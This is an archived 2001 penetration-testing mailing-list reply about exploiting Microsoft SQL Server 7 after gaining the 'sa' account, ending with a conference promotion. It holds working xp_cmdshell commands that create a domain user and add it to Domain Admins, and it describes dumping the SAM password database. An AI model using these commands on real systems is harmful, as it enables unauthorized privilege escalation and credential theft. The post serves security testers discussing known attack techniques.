Penetration Testing mailing list archives

Re: [PEN-TEST] Hacking a server through SQL SERVER 7

From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Tue, 23 Jan 2001 16:21:20 -0600

Once you have access to a MSSQL 7 server via the "sa" account, you can do all
sorts of fun things:

Run system commands:

EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD
/DOMAIN"

You can also access the registry, send email, dump system information... Take
a look at some of the Extended Stored Procedures in the [master] database
with SQL Query Analyzer.  Depending on the user the server runs at (normally
SYSTEM or Administrator), you can usually use xp_cmdshell to rebuild the
repair disk data with rdisk /s and snag the SAM database.

I will be giving a presentation at the upcoming CanSecWest conference
covering a variety of SQL server attacks, everything from general procedure
exploitation to insertion techniques.  At the conference, I will be releasing
a handful of new tools, one of which exploits the RDS component in new ways,
allowing access to SQL servers as well as proxying requests to internal
systems through it.  For more information on the conference, please see
http://www.cansecwest.com, online registration should be available within a
few weeks.

-HD

http://www.digitaldefense.net (work)